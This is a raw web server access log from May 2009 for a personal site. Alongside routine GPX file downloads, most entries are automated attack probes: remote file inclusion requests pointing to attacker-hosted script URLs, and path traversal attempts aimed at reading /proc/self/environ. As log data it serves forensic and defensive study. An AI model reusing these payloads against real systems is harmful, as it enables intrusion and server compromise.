64.157.4.41 - - [20/May/2009:09:16:13 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
216.151.134.36 - - [20/May/2009:09:16:13 -0700] "GET /logs/access_081231.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:17 -0700] "GET /logs/access_081212.log/index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:16:26 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:16:26 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:16:28 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:45 -0700] "GET /logs/index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:16:46 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:49 -0700] "GET /logs/access_080815.log/index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:52 -0700] "GET /logs/access_081212.log/index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:52 -0700] "GET /index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 200 41990 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:54 -0700] "GET /index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 200 41990 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:54 -0700] "GET /index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 200 41990 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:17:04 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
195.70.36.69 - - [20/May/2009:09:17:19 -0700] "GET /logs/access_081201.log/////////?cmd&file=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.70.36.69 - - [20/May/2009:09:17:20 -0700] "GET /logs/access_090215.log/////////?cmd&file=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:17:29 -0700] "GET /index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 200 41990 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:19:18 -0700] "GET /logs/access_080624.log//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:19:19 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:19:19 -0700] "GET /logs/access_080624.log//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:19:19 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:19:19 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:19:20 -0700] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:19:20 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:19:21 -0700] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:19:30 -0700] "GET /logs/access_080313.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:19:52 -0700] "GET /logs/access_080929.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:19:53 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:19:53 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:20:01 -0700] "GET /logs/access_080929.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:20:02 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:20:03 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:20:20 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:20:20 -0700] "GET /claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:20:20 -0700] "GET /logs/access_080919.log//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:20:21 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:20:21 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:20:21 -0700] "GET /logs/access_090217.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:20:22 -0700] "GET /claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:20:22 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:20:22 -0700] "GET /logs/access_080919.log//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:20:23 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:20:23 -0700] "GET /claroline/tracking/userLog.php?rootSys=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:20:23 -0700] "GET /logs/access_080919.log//claroline/tracking/userLog.php?rootSys=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:20:31 -0700] "GET /logs/access_080601.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:20:41 -0700] "GET /logs/access_080110.log//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:20:43 -0700] "GET /logs/access_080313.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:20:43 -0700] "GET /logs/access_080110.log//claroline/tracking/userLog.php?rootSys=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:20:43 -0700] "GET /logs/access_080110.log//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:20:51 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:20:51 -0700] "GET /logs/access_080809.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:20:51 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:20:51 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:20:51 -0700] "GET /logs/access_080809.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:20:51 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:20:51 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:20:51 -0700] "GET /logs/access_080809.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:20:51 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:20:51 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:20:51 -0700] "GET /logs/access_080809.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:20:52 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:20:56 -0700] "GET /logs/access_090217.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:20:56 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:20:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:21:07 -0700] "GET /logs/access_080601.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:21:07 -0700] "GET /logs/access_080106.log%20%20//claroline/tracking/userLog.php?rootSys=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:21:07 -0700] "GET /logs/access_080524.log%20%20//claroline/tracking/userLog.php?rootSys=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:21:41 -0700] "GET /modules/xfsection/modify.php?dir_module=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:21:41 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:21:41 -0700] "GET /logs/access_080122.log%20//modules/xfsection/modify.php?dir_module=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:21:53 -0700] "GET /logs/access_080812.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:21:53 -0700] "GET /logs/access_080812.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:21:53 -0700] "GET /logs/access_080812.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:21:53 -0700] "GET /logs/access_080812.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:12 -0700] "GET /logs/access_080514.log/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:12 -0700] "GET /logs/access_081209.log/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:12 -0700] "GET /logs/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:12 -0700] "GET /logs/access_081209.log%20%20/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:12 -0700] "GET /logs/access_080514.log%20%20/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:22:15 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:15 -0700] "GET /logs/access_081209.log/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:15 -0700] "GET /logs/access_080514.log/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:15 -0700] "GET /logs/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:16 -0700] "GET /logs/access_080514.log%20%20/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:17 -0700] "GET /logs/access_081209.log/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:17 -0700] "GET /logs/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:17 -0700] "GET /logs/access_080514.log%20%20/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:17 -0700] "GET /logs/access_081209.log%20%20/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:19 -0700] "GET /logs/access_081209.log%20%20/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:20 -0700] "GET /logs/access_080514.log/index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:22:30 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:22:38 -0700] "GET /logs/access_080919.log%20%20//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:22:39 -0700] "GET /logs/access_080110.log%20%20//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:22:40 -0700] "GET /logs/access_080919.log%20%20//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:22:42 -0700] "GET /logs/access_080110.log%20%20//claroline/tracking/userLog.php?rootSys=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:22:46 -0700] "GET /index2.php?mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:22:46 -0700] "GET /logs/access_081104.log%20%20//index2.php?mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:46 -0700] "GET /logs/access_090217.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:22:46 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:46 -0700] "GET /logs/access_080601.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:22:56 -0700] "GET /index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 200 41954 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.98.226 - - [20/May/2009:09:22:57 -0700] "GET /logs/access_081117.log//?mosConfig_absolute_path=http://www.graal-plus.zp.ua//images/rox.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:23:05 -0700] "GET /logs/access_080731.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:23:07 -0700] "GET /logs/access_080731.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:23:08 -0700] "GET /logs/access_080315.log/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:23:09 -0700] "GET /administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:23:09 -0700] "GET /logs/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:23:11 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:23:19 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:23:25 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:23:26 -0700] "GET /logs/access_081104.log%20%20//index2.php?mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:23:26 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
